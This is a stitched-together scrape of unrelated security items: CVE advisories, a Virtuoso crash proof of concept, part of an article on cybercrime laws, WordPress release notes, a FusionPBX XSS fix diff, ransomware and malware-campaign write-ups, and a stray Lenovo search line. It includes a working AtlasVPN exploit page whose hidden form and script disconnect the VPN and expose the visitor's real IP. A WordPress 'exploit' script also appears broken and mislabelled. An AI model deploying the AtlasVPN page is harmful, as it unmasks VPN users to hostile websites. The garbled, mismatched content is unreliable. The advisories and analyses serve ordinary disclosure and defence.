WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

An issue in the box_equal function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 SMALLINT CHECK ( CONTAINS ( 'del' , 'reabbreviating' , 'diamonds' ) ) ) ; 

backtrace:

#0 0xdeab6a (box\_equal+0xba)
#1 0x773df3 (sqlo\_cname\_ot+0x53)
#2 0x6e0161 (sqlo\_df+0x461)
#3 0x6e0d6c (sqlo\_df+0x106c)
#4 0x6e067f (sqlo\_df+0x97f)
#5 0x70ea77 (sqlo\_top\_2+0x267)
#6 0x70e4a5 (sqlo\_top\_1+0x135)
#7 0x70ffa6 (sqlo\_top\_select+0x156)
#8 0x6b9b6f (sql\_stmt\_comp+0x8bf)
#9 0x6bc9d2 (sql\_compile\_1+0x1a62)
#10 0x4e213f (ddl\_table\_check\_constraints\_define\_triggers+0x1af)
#11 0x4e462d (ddl\_table\_constraints+0xd0d)
#12 0x4e5331 (sql\_ddl\_node\_input\_1+0xbc1)
#13 0x4e57ee (sql\_ddl\_node\_input+0x10e)
#14 0x7bcb0b (ddl\_node\_input\_1+0x19b)
#15 0x7bd1e7 (qn\_without\_ac\_at+0xc7)
#16 0x7af05e (qn\_input+0x3ce)
#17 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#18 0x7ce602 (sf\_sql\_execute+0x15d2)
#19 0x7cecde (sf\_sql\_execute\_w+0x17e)
#20 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#21 0xe214bc (future\_wrapper+0x3fc)
#22 0xe28dbe (\_thread\_boot+0x11e)
#23 0x7f4182517609 (start\_thread+0xd9)
#24 0x7f41822e7133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48951: Fuzzer: Virtuoso 7.2.11 crashed at box_equal · Issue #1177 · openlink/virtuoso-opensource

From US state laws to the international stage, definitions of “cybercrime” remain vague, broad, and increasingly entrenched in our legal systems.

Some state anti-hacking laws are even broader than the CFAA, says Crocker, the EFF attorney. California Penal Code Section 502, which Crocker describes as “pretty typical” of state-level cybercrime laws, includes language similar to the CFAA’s vague “unauthorized access” prohibition. But it also stipulates that someone who “knowingly accesses and without permission alters, damages, deletes, destroys, or otherwise uses any data, computer, computer system, or computer network” may have broken state law. 

Crocker says the EFF has argued against prosecutions where the only alleged criminal activity that occurred under Section 502 was the defendant downloading publicly accessible data that the owner of the data failed to keep private—a common activity among security researchers and journalists.

All of these broadly worded state-level cybercrime statutes can lead to over-criminalization, says Nellie King, president of the National Association of Criminal Defense Lawyers. It becomes particularly problematic when there’s little clarity about when an activity crosses the line from legal to illegal. Laws against “cyber-stalking” are a good example, King says. “I can’t tell you how many of those cases where I have to go in and say, ‘This is not stalking. This is being annoying.’” 

In addition to vague laws, cybercrime statutes are sometimes essentially duplicates of other laws on the books, which means people can be charged twice for the same act—a “double counting of crime,” says Crocker. For example, prosecutors could “charge someone with the underlying crime of fraud but then enhance it with another crime of fraud conducted over the internet where there's no harm to the actual computers or networks,” he says. King agrees, adding that states can tack on additional “cyber-related” charges “to get the sentencing jacked.”

Finally, unlike the CFAA, many state cybercrime laws have not been heavily tested by the courts, says Crocker, which leaves them open to broader interpretation. “Most states have relatively sparse case law on their state hacking law,” he says, “so you have … laws without a lot of interpretation, which is a very risky area for individuals who risk running afoul of these laws.”

Rushing Into the Void

The solution to vague, expansive cybercrime legislation is to craft legal definitions that are limited to “cyber-dependent” activities, experts say. “If ‘cybercrime’ is going to mean anything, it has to be specifically limited to crimes done to computer systems and networks using computer systems and networks,” Crocker says. “In other words, it has to be the kind of crime that could not exist if this technology did not exist. ‘Cybercrime’ can't just be any bad thing done using a computer.”

Of course, amending the mountain of US state and federal cybercrime laws is unlikely to happen, Crocker says. Even just the CFAA, which Congress could update at any time, remains largely unchanged despite several attempts to amend the law. The greatest opportunity to prevent further expansion of over-criminalization through cybercrime laws now is with the UN treaty. But even with support from many member nations to limit the list of crimes covered by the treaty to “cyber-dependent” ones, and concerted efforts from civil liberties groups to exclude offenses committed unintentionally or without causing serious harm and to add safeguards against abuse, Article 19’s Gutiérrez remains skeptical.

“The probability that we get this, I think, is very low,” Gutiérrez says.

Still, the treaty’s negotiations are ongoing, with the Ad Hoc Intergovernmental Committee scheduled to meet for the fifth round of negotiations in mid-April and the sixth round in late summer. The final text of the treaty is expected to be completed by February 2024—a tight time frame that Gutiérrez says could cause trouble for an international agreement of this complexity, magnitude, and consequence.

The speed of the negotiations means there is little time to bring the treaty’s language more in line with what civil liberties and human rights groups say is essential. In fact, it could lead to a country like Russia or China slipping in language at the last minute that would be even more detrimental to what’s already in the negotiating document—something that reportedly happened during the fourth negotiating session in January. “The truth is that the issues are so complex, they are so technical, and there's very little time to negotiate all this,” Gutiérrez says. “So there’s no question some of this language will get into the treaty, because it's not just overlooked—the process is really, really being super rushed.”

The World’s Real ‘Cybercrime’ Problem

The Brizy Page Builder plugin <= 2.3.11 for WordPress used an incorrect authorization check that allowed any logged-in user accessing any endpoint in the wp-admin directory to modify the content of any existing post or page created with the Brizy editor. An identical issue was found by another researcher in Brizy <= 1.0.125 and fixed in version 1.0.126, but the vulnerability was reintroduced in version 1.0.127.

CVE-2021-38345: Multiple Vulnerabilities in Brizy Page Builder Plugin Allow Site Takeover

Cypress : https://www.infineon.com/ Cypress Bluetooth Mesh SDK BSA0107_05.01.00-BX8-AMESH-08 is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: affected function is pb_transport_handle_frag_. ¶¶ In Cypress Bluetooth Mesh SDK, there is an out-of-bound write vulnerability that can be triggered during mesh provisioning. Because there is no check for mismatched SegN and TotalLength in Transaction Start PDU.

CVE-2022-31363

Logga in

Arkiv

Redigera

Visa

Verktyg

Hjälp

CVE-2022-31363: CVE-2022-31363.docx

Kransom ransomware hides within the StarRail game using DLL side-loading and a legitimate certificate from COGNOSPHERE PTE. LTD.…

Kransom ransomware hides within the StarRail game using DLL side-loading and a legitimate certificate from COGNOSPHERE PTE. LTD. Bypassing detection, this malware delivers an encrypted payload. Analyze it in ANY.RUN’s interactive sandbox.

Researchers at ANY.RUN have discovered that the Kransom ransomware is being disguised as a game to evade detection. This malware employs DLL side-loading to execute its payload, using a legitimate certificate from COGNOSPHERE PTE. LTD. The latter adds an extra layer of deception to its attack. 

****Overview of Kransom Ransomware****

The ransomware execution flow

Kransom ransomware is cleverly disguised within the game StarRail, a legitimate software used as a front to trick users. The malware relies on a DLL file stored in the same directory as the game, which contains its encrypted ransomware code. 

This is a classic case of DLL side-loading, where a legitimate executable file loads a malicious DLL, allowing the ransomware to hijack the execution flow.

****Legitimate Certificate with Malicious Intent****

One of the most deceptive elements of Kransom is its use of a legitimate certificate from COGNOSPHERE PTE. LTD. By using a trusted certificate, the malware is able to bypass many traditional security measures, as the system recognizes the software as harmless. 

The valid certificate is displayed in ANY.RUN

However, malicious actions take place once the StarRailBase.dll is loaded by the executable, initiating the ransomware attack.

****How Kransom Ransomware Works****

To observe how Kransom ransomware works, a sample of this malware can be uploaded to a malware sandbox like ANY.RUN. The sandbox allows anyone to carry out a full analysis of the malware’s execution process, from its initial stages to the completion of its payload.

The legitimate **StarRail** game serves as a mask for the ransomware, which won’t function without the presence of the malicious **StarRailBase.dll** file. This DLL contains the ransomware’s encrypted payload, which is then executed by the game’s EXE file.

Malicious activity executed by DLL file in ANY.RUN

It should be noted that the game **StarRail**, developed by **HoYoverse**, is completely safe when used in its original form. However, Kransom takes advantage of the game’s structure to embed its malicious code in the same folder, making it difficult for users to notice anything unusual.

The ransomware code within the DLL is encrypted using XOR, making it harder to detect. Tools like ANY.RUN can help security analysts uncover what’s been XORed, providing crucial insight into the malicious content.

XOR-URL displayed in ANY.RUN sandbox

Once the ransomware is activated, users are met with a message: _“I believe you’ve encountered some problems. Email to hoyoverse for solutions.”_

Ransom note analyzed inside ANY.RUN’s sandbox

You can have a more comprehensive analysis of this malware by searching for additional samples in ANY.RUN’s TI Lookup tool.

Samples in ANY.RUN’s TI Lookup

****Try ANY.RUN Sandbox for Free****

To analyze your own malware and phishing samples in a fully interactive Windows 10 x64 or Linux VM environment, create a free ANY.RUN account using your email.

ANY.RUN’s cloud sandbox allows you to interact with files, URLs, and the system as if you were using a standard computer. You can download attachments, solve CAPTCHAs, and even reboot the entire system during analysis.

For advanced features like private mode and collaboration tools, you can request a 14-day free trial directly from ANY.RUN’s official website.

1.  **Analysis of Top Infostealers: Redline, Vidar and Formbook**
2.  **New ransomware locks files & asks victims to play PUBG game**
3.  **This Ransomware tells users to play a Japanese game – That’s all**
4.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
5.  **New Ransomware Asks User to Play a Game while Encrypting Data**

Ransomware Disguised as a Game: Kransom’s Attack Through DLL Side-Loading

WordPress before 5.5.2 mishandles embeds from disabled sites on a multisite network, as demonstrated by allowing a spam embed.

WordPress 5.5.2 is now available!

This security and maintenance release features 14 bug fixes in addition to 10 security fixes. Because this is a **security release**, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated.

WordPress 5.5.2 is a short-cycle security and maintenance release. The next major release will be version 5.6.

You can download WordPress 5.5.2 by downloading from WordPress.org, or visit your Dashboard → Updates and click Update Now.

If you have sites that support automatic background updates, they’ve already started the update process.

**Security Updates**

Ten security issues affect WordPress versions 5.5.1 and earlier. If you haven’t yet updated to 5.5, all WordPress versions since 3.7 have also been updated to fix the following security issues:

*   Props to Alex Concha of the WordPress Security Team for their work in hardening deserialization requests.
*   Props to David Binovec on a fix to disable spam embeds from disabled sites on a multisite network.
*   Thanks to Marc Montas from Sucuri for reporting an issue that could lead to XSS from global variables.
*   Thanks to Justin Tran who reported an issue surrounding privilege escalation in XML-RPC. He also found and disclosed an issue around privilege escalation around post commenting via XML-RPC.
*   Props to Omar Ganiev who reported a method where a DoS attack could lead to RCE.
*   Thanks to Karim El Ouerghemmi from RIPS who disclosed a method to store XSS in post slugs.
*   Thanks to Slavco for reporting, and confirmation from Karim El Ouerghemmi, a method to bypass protected meta that could lead to arbitrary file deletion.
*   Thanks to Erwan LR from WPScan who responsibly disclosed a method that could lead to CSRF.
*   And a special thanks to @zieladam who was integral in many of the releases and patches during this release.

Thank you to all of the reporters for privately disclosing the vulnerabilities. This gave the security team time to fix the vulnerabilities before WordPress sites could be attacked.

For more information, browse the full list of changes on Trac, or check out the version 5.5.2 HelpHub documentation page.

**Thanks and props!**

The 5.5.2 release was led by @whyisjake and the following release squad:  @audrasjb, @davidbaumwald, @desrosj, @johnbillion, @metalandcoffee, @noisysocks @planningwrite, @sarahricker and @sergeybiryukov.

In addition to the security researchers and release squad members mentioned above, thank you to everyone who helped make WordPress 5.5.2 happen:

Aaron Jorbin, Alex Concha, Amit Dudhat, Andrey “Rarst” Savchenko, Andy Fragen, Ayesh Karunaratne, bridgetwillard, Daniel Richards, David Baumwald, Davis Shaver, dd32, Florian TIAR, Hareesh, Hugh Lashbrooke, Ian Dunn, Igor Radovanov, Jake Spurlock, Jb Audras, John Blackbourn, Jonathan Desrosiers, Jon Brown, Joy, Juliette Reinders Folmer, kellybleck, mailnew2ster, Marcus Kazmierczak, Marius L. J., Milan Dinić, Mohammad Jangda, Mukesh Panchal, Paal Joachim Romdahl, Peter Wilson, Regan Khadgi, Robert Anderson, Sergey Biryukov, Sergey Yakimov, Syed Balkhi, szaqal21, Tellyworth, Timi Wahalahti, Timothy Jacobs, Towhidul I. Chowdhury, Vinayak Anivase, and zieladam.

CVE-2020-28033: WordPress 5.5.2 Security and Maintenance Release

In FusionPBX up to v4.5.7, the file app\access_controls\access_control_nodes.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.

@@ -13,7 +13,7 @@

The Original Code is FusionPBX

The Initial Developer of the Original Code is

Mark J Crane <markjcrane@fusionpbx.com>

Portions created by the Initial Developer are Copyright (C) 2018

Portions created by the Initial Developer are Copyright (C) 2019

the Initial Developer. All Rights Reserved.

Contributor(s):

Mark J Crane <markjcrane@fusionpbx.com>

@@ -26,7 +26,8 @@

  

//check permissions

if (!permission\_exists('access\_control\_node\_view')) {

echo "access denied"; exit;

echo "access denied";

exit;

}

  

//add multi-lingual support

@@ -87,7 +88,7 @@

echo th\_order\_by('node\_description', $text\['label-node\_description'\], $order\_by, $order);

echo "<td class='list\_control\_icons'>";

if (permission\_exists('access\_control\_node\_add')) {

echo "<a href='access\_control\_node\_edit.php?access\_control\_uuid=".escape($\_GET\['id'\])."' alt='".$text\['button-add'\]."'>$v\_link\_label\_add</a>";

echo "<a href='access\_control\_node\_edit.php?access\_control\_uuid=".urlencode($\_GET\['id'\])."' alt='".$text\['button-add'\]."'>$v\_link\_label\_add</a>";

}

else {

echo "&nbsp;\\n";

@@ -98,7 +99,7 @@

if (is\_array($access\_control\_nodes)) {

foreach($access\_control\_nodes as $row) {

if (permission\_exists('access\_control\_node\_edit')) {

$tr\_link = "href='access\_control\_node\_edit.php?access\_control\_uuid=".escape($row\['access\_control\_uuid'\])."&id=".escape($row\['access\_control\_node\_uuid'\])."'";

$tr\_link = "href='access\_control\_node\_edit.php?access\_control\_uuid=".urlencode($row\['access\_control\_uuid'\])."&id=".urlencode($row\['access\_control\_node\_uuid'\])."'";

}

echo "<tr ".$tr\_link."\>\\n";

echo " <td valign='top' class='".$row\_style\[$c\]."'>".escape($row\['node\_type'\])."&nbsp;</td>\\n";

@@ -107,10 +108,10 @@

echo " <td valign='top' class='".$row\_style\[$c\]."'>".escape($row\['node\_description'\])."&nbsp;</td>\\n";

echo " <td class='list\_control\_icons'>";

if (permission\_exists('access\_control\_node\_edit')) {

echo "<a href='access\_control\_node\_edit.php?access\_control\_uuid=".escape($row\['access\_control\_uuid'\])."&id=".escape($row\['access\_control\_node\_uuid'\])."' alt='".$text\['button-edit'\]."'>$v\_link\_label\_edit</a>";

echo "<a href='access\_control\_node\_edit.php?access\_control\_uuid=".urlencode($row\['access\_control\_uuid'\])."&id=".urlencode($row\['access\_control\_node\_uuid'\])."' alt='".$text\['button-edit'\]."'>$v\_link\_label\_edit</a>";

}

if (permission\_exists('access\_control\_node\_delete')) {

echo "<a href='access\_control\_node\_delete.php?access\_control\_uuid=".escape($row\['access\_control\_uuid'\])."&id=".escape($row\['access\_control\_node\_uuid'\])."' alt='".$text\['button-delete'\]."' onclick=\\"return confirm('".$text\['confirm-delete'\]."')\\"\>$v\_link\_label\_delete</a>";

echo "<a href='access\_control\_node\_delete.php?access\_control\_uuid=".urlencode($row\['access\_control\_uuid'\])."&id=".urlencode($row\['access\_control\_node\_uuid'\])."' alt='".$text\['button-delete'\]."' onclick=\\"return confirm('".$text\['confirm-delete'\]."')\\"\>$v\_link\_label\_delete</a>";

}

echo " </td>\\n";

echo "</tr>\\n";

@@ -122,7 +123,7 @@

echo "</table>\\n";

if (permission\_exists('access\_control\_node\_add')) {

echo "<div style='float: right;'>\\n";

echo " <a href='access\_control\_node\_edit.php?access\_control\_uuid=".escape($\_GET\['id'\])."' alt='".$text\['button-add'\]."'>$v\_link\_label\_add</a>";

echo " <a href='access\_control\_node\_edit.php?access\_control\_uuid=".urlencode($\_GET\['id'\])."' alt='".$text\['button-add'\]."'>$v\_link\_label\_add</a>";

echo "</div>\\n";

}

echo "<br />\\n";

CVE-2019-16982: Update access_control_nodes.php · fusionpbx/fusionpbx@c9f87dc

Remote disconnect exploit for AtlasVPN Linux client version 1.0.3 that will allow a remote website to extract a client's real IP address.

    The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.Root CauseThe AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.Exploit CodeThe following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. Not intended for illegal purposes.    <html>     <head>      <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>    </head>     <body>      <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=     You should be running the atlasvpn linux client and be connected to a VPN.    Use <b>atlasvpn connect</b> to connect to a VPN server.     </code></pre>       <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>      <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">        <button type="submit" style="display: none"></button>      </form>       <script>        window._currentIP = false;         // Run main exploit code        window.addEventListener('load', function () {          addIPToLog();          setTimeout(triggerFormSubmission, 1000);          setTimeout(addIPToLog, 3000);        });         // Blind CORS request to atlasvpnd to disconnect the VPN        function triggerFormSubmission() {          var logDiv = document.getElementById('log');          logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";          document.getElementById('stopForm').submit();        }         // Gets IP from ipfy API (this, of course, could be your server)        function addIPToLog() {          var logDiv = document.getElementById('log');          var xhr = new XMLHttpRequest();           xhr.open('GET', 'https://api.ipify.org?format=json', true);           xhr.onload = function () {            var ipAddress = window._currentIP;            if (xhr.status === 200) {              var response = JSON.parse(xhr.responseText);              ipAddress = response.ip;               logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";            } else {              logDiv.innerHTML += '[-] Error fetching IP address.\n';            }             // Check if the IP changed. If yes: Success.            if (window._currentIP && window._currentIP != ipAddress) {              logDiv.innerHTML += "[+] Successfully disconnected VPN."            }            if (window._currentIP && window._currentIP == ipAddress) {              logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."            }             // Save IP for next iteration.            window._currentIP = ipAddress;          };           xhr.send();        }      </script>    </body>    </html>    GreetsFly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.

AtlasVPN Linux Client 1.0.3 IP Leak

By Deeba Ahmed
This newly discovered malware campaign is attributed to a Chinese hacking group called Tropic Trooper. Cybersecurity researchers at…
This is a post from HackRead.com Read the original post: Chinese Hackers Distributing Nim language Malware in SMS Bomber Tool

****This newly discovered malware campaign is attributed to a Chinese hacking group called Tropic Trooper.****

Cybersecurity researchers at Check Point have shared details of a new malware campaign suspected to be launched by a Chinese hacking group Tropic Trooper.

The malware operators are using a unique loader Nimbda, written in Nim language, and a new variant of Yahoyah trojan.

Researchers state that the hackers possess extensive cryptographic knowledge as they have extended the AES specification in a customized implementation.

**Info-Stealing Trojan Embedded in SMS Bomber Tool**

According to Check Point’s analysis, the info stealing trojan is hidden inside a Chinese language greyware tool called SMS Bomber. This tool is used for targeting cellphones with Denial of Service attacks (DoS attacks).

SMS Bomber tool allows users to enter any phone number to flood their phones with a message, rendering the devices unusable. Novice hackers typically use such tools to compromise websites.

**Attack Scenario**

When the infected version of SMS Bomber (equipped with standard functionalities and the tool’s binary) is downloaded to the device, the attack sequence is immediately initiated. The downloaded tool also contains additional coding injected into a notepad.exe process. 

In a blog post, researchers explained that This executable is the Nimbda loader, which uses the SMS Bomber as an icon and an executable while the loader injects shellcode in the notepad process in the background. The process then reaches a GitHub repository, fetches an obfuscated executable, decodes it, and executes it through process hollowing in Dllhost.exe, the new Yahoyah variant. 

This variant collects host-related data and transmits it to the attacker-operated C2 server. The final payload that Yahoyah executable drops is encoded in a JPG file through steganography. Researchers identified it as TClient. It is a backdoor used in previous campaigns by Tropic Trooper.

The interface of SMS Bomber (left) – Infection chain of the malware (right)

**What Information is Collected**

Yahoyah can collect device names, local wireless networks’ SSIDs located within the target device’s vicinity, MAC address, antivirus products installed on the device, OS version, and presence of Tencent and WeChat files.

The encryption used for Yahoyah is a custom AES implementation to perform the inverted sequence of round operations twice. Therefore, Check Point named it AEES. Though it doesn’t make encryption any stronger, it makes analyzing it complicated for researchers.

**Potential Targets**

Tropic Trooper has mainly focused on espionage in their previously identified phishing campaigns targeting Russian entities. However, in this campaign, the hackers have trojanized the SMS Bomber tool; hence they have narrowed down their targets.

Researchers believe their target could be based on the intelligence information the group collected during past espionages. Tropic Trooper also uses KeyBoy, Earth Centaur, and Pirate Panda monikers.

The group has a history of targeting targets in Hong Kong, Taiwan, and the Philippines. Moreover, their prominent targets are linked to the government, transportation, healthcare, and technology sectors.

**More Chinese Hackers in Action News**

*   China’s insidious surveillance against Uyghurs with Android malware
*   Android malware HenBox hits Xiaomi devices & minority group in China
*   China arrests 11 hackers for infecting 250M devices with Fireball malware
*   Someone from China is Distributing Mirai Malware Through Windows Botnet
*   Unofficial Micropatch for Follina Issued as Chinese Hackers Exploit the 0-day

Search

lenovo warranty check/lookup | check warranty status | lenovo support us